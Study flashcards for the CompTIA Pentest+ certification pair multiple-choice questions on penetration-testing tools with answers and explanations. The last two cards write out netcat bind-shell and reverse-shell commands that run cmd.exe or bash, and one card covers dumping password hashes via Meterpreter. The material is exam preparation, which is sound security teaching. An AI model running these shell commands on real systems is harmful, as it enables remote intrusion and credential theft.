CompTIA Pentest+ for Dummies Chapter 9 Prep Test Flashcards
You want to perform a vulnerability scan of a system on the network. What tool would you use? A.Hydra B.Nessus C.Maltego D.SQLMap
B.Nessus
Explanation:
Nessus is a commercial vulnerability scanner that will assess your system and identify issues with it such as patches that are missing and poor security configuration
You are performing a pentest for a company and the company Intranet server is in the scope of the assessment.
What tool would you use to determine if there are any vulnerabilities with the web server?
A.Ncat
B.Maltego
C.Hashcat
D.Nikto
D.Nikto
Explanation:
Nikto is an example of a web application vulnerability scanner that will assess configuration issues with the web application that makes you vulnerable to attack
You would like to assess a core software application used by your customer while doing a penetration test.
What software assurance tool would you use to send random input to the application to assess how it responds?
A.nc
B.Hashcat
C.AFL
D.Mimikatz
C.AFL
Explanation:
In this scenario we are looking for a fuzzing tool.
AFL is an example of a fuzzing tool that will send arbitrary input to an application to asses how it handles the input
You are performing an authorized pentest on a Windows server and have exploited the system with Metasploit and managed to get a meterpreter session.
What command would you use to obtain a list of password hashes for the accounts that reside on that system?
A.hashdump
B.hashit
C.sysinfo
D.hashcat
A.hashdump
Explanation:
hashdump is a post-exploitation command that you can use to obtain the hash values of user accounts.
After obtaining the hashes, you could then attempt to crack the password hashes with a tool like John the Ripper
You are assessing the security of a web application that connects to a database to display inventory data.
What tool would you use to test the web application against SQL injection attacks?
A.OpenVAS
B.Medusa
C.Cain and Abel
D.SQLmap
D.SQLmap
Explanation:
SQLMap is a tool that you can use to automate SQL injection attacks on an application
You are performing a pentest for Company XYZ.
You would like to generate a password list file from the contents of the customer website.
What tool would you use?
A.Medusa
B.CeWL
C.AFL
D.GDB
B.CeWL
Explanation:
CeWL is a tool that you can use to scan through the pages of a website and pick up on words that are used in the web pages to build a wordlist file to use with password cracking tools! :-)
What tool would you use to crack password hashes that you have obtained in a previous step of your assessment? (Choose Two) A.Peach Fuzzer B.theHarvester C.Cain and Abel D.OWASP ZAP E.John The Ripper
C.Cain and Abel
E.John The Ripper
Explanation:
You can use Cain and Abel and John the Ripper to crack password hashes
You are looking to assess the security of a web application used by the company.
What tool would you use to assess the web application for security vulnerabilities?
A.Burp Suite
B.BeEF
C.Drozer
D.PowerSploit
A.Burp Suite
Explanation:
Burp Suite can be used as a web proxy and a web application vulnerability tester
You wish to set up a bind shell on the target Windows system you are assessing whose IP address is 10.0.1.5. What command would you use on that system to set up the bind shell? (A) nc 10.0.1.5 -p 5555 -e cmd.exe (B) nc -n -v -l -p 5555 -e cmd.exe (C) nc -10.0.1.5 -e cmd.exe (D) nc -n -v -p 5555 -e cmd.exe
(B) nc -n -v -l -p 5555 -e cmd.exe
Explanation:
Because you are looking to set up a bind shell on the target system, you are looking to set up the listener, which uses nc with a -l swtich (for listener)
In this scenario you are also working with a Windows target system, so the command to execute should be ‘cmd.exe’
You would like to configure a reverse bind shell. Your pentester system has the IP address 10.0.1.2, while your Linux target has the IP address 10.0.1.5. What command would you use on a Linux target system for the reverse bind shell?
(A) nc -n -v 10.0.1.2 5555 -e cmd.exe
(B) nc -n -v -l 5555 10.0.1.2 -e /bin/ bash
(C) nc -n -v 10.0.1.2 5555 -e /bin/ bash
(D) nc -n -v -l 5555 10.0.1.5 -e cmd.exe
(C) nc -n -v 10.0.1.2 5555 -e /bin/ bash
Explanation:
In this scenario you are looking to set up a reverse shell so the listener (-l) would be on the pentesters system.
The reason I mention this is because the question is asking you what command you would use on the target, so you are looking for a command without -l.
You also are lloking for a command to use on a Linux target so -e shouild reference /bin/bash instead of ‘cmd.exe’